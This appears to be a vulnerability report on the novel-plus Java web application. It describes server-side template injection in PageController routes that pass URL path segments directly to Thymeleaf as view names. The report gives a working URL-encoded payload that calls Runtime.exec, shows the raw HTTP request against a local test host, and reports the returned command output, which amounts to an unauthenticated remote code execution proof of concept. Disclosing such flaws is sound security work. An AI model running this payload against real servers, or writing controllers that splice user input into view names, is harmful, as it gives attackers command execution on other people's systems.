GSBP
Version<= 4.4.0
https://github.com/201206030/novel-plus
Vulnerability File:
novel-plus/novel-front/src/main/java/com/java2nb/novel/controller/page/PageController.java
novel-plus/novel-crawl/src/main/java/com/java2nb/novel/controller/page/PageController.java
PageController code in multiple interfaces using access paths directly spliced into the thymeleaf rendering path, coupled with the thymeleaf component version is not high, can be directly SSTI, the realization of arbitrary code injection, resulting in the execution of the command and other serious consequences
@RequestMapping("{url}.html")
public String module(@PathVariable("url") String url) {
return url;
}
@RequestMapping("{module}/{url}.html")
public String module2(@PathVariable("module") String module, @PathVariable("url") String url,
HttpServletRequest request) {
if (request.getRequestURI().startsWith("/author")) {
//访问作者专区
UserDetails user = getUserDetails(request);
if (user == null) {
//未登录
return "redirect:/user/login.html?originUrl=" + request.getRequestURI();
}
boolean isAuthor = authorService.isAuthor(user.getId());
if (!isAuthor) {
return "redirect:/author/register.html";
}
}
return module + "/" + url;
}
@RequestMapping("{module}/{classify}/{url}.html")
public String module3(@PathVariable("module") String module, @PathVariable("classify") String classify,
@PathVariable("url") String url) {
return module + "/" + classify + "/" + url;
}
We can test for the existence of the vulnerability by simply entering the following payload
%5f%5f%24%7b%6e%65%77%20%6a%61%76%61%2e%75%74%69%6c%2e%53%63%61%6e%6e%65%72%28%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%69%64%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%2e%6e%65%78%74%28%29%7d%5f%5f%3a%3a%2e%78.html
(__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(“id”).getInputStream()).next()}__::.x.html's url encoding)
You can see that the result uid=501(gsbp) of the command execution is output in the response packet
Here is my request package
GET /%5f%5f%24%7b%6e%65%77%20%6a%61%76%61%2e%75%74%69%6c%2e%53%63%61%6e%6e%65%72%28%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%69%64%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%2e%6e%65%78%74%28%29%7d%5f%5f%3a%3a%2e%78.html HTTP/1.1
Host: 127.0.0.1:8088
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: OFBiz.Visitor=10000; PUBLICCMS_ANALYTICS_ID=eb392c29-86ae-4291-9f9a-3adaaf621c88; PUBLICCMS_USER=2_d7d6c8b8-6750-447e-bf8e-475294b6cb03; PUBLICCMS_ADMIN=1_6f4b4818-1f3e-41b5-8027-1627cb68d2a8; JSESSIONID=321a6ce2-fc9a-4dc7-a1bb-b8355b345975; userClientMarkKey=409cb988808a48349c409a02fab9890d; Hm_lvt_ecc8b50a3122e6d5e09be7a9e5383e07=1738348967; Hm_lpvt_ecc8b50a3122e6d5e09be7a9e5383e07=1738348967; HMACCOUNT=683131F95E4EB9B9
Connection: keep-alive
This vulnerability requires no authentication and is simple to exploit, making it very harmful